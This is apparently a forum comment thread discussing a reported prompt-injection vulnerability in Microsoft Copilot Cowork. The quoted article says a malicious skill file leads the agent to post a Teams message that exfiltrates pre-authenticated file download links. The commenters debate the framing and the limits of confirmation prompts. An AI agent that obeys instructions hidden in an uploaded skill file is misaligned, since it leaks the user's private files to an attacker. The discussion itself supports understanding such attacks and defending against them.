| ▲ | mlacks 4 hours ago | |||||||
Exfiltrates: to steal sensitive data from a computer system (for example, via a flash drive). I'm not going to defend Microsoft here, but the title (at the source blog) is misleading and a bit rage-baity. What happened with Cowork may have been rushed, possibly due to incompetence, but incompetence is not malice. This framing is also recycled across a few of the author's other interesting findings. Within the article, the wording is much more accurate: “The victim uploads a skill file to Copilot Cowork that contains a prompt injection,” and “The injection manipulates Microsoft Copilot Cowork into posting a Teams message that exfiltrates pre-authenticated file download links when viewed.” | ||||||||
| ▲ | znort_ an hour ago | parent | next [-] | |||||||
> Within the article, the wording is much more accurate: “The victim uploads a skill file to Copilot Cowork that contains a prompt injection,” and “The injection manipulates Microsoft Copilot Cowork into posting a Teams message that exfiltrates pre-authenticated file download links when viewed.” it's indeed accurate and clearly states what the outcome is: an exfiltration. why is it misleading to say so in the title? it's pretty obvious that it means that "cowork" is the component vulnerable to exfiltration, not the prime actor. | ||||||||
| ▲ | codebje 4 hours ago | parent | prev [-] | |||||||
The malice is by the author of the malicious skill file. This is an intrinsic risk associated with giving LLMs access to sensitive material. It's reckless of Microsoft to give an LLM such broad access based on the user's own permissions. If there were a confirmation prompt for the Teams message, why would even a highly competent user refuse it? That's what the skill says it will do. The message is expected, the visible content is expected, a confirmation prompt is just a nuisance. | ||||||||
| ||||||||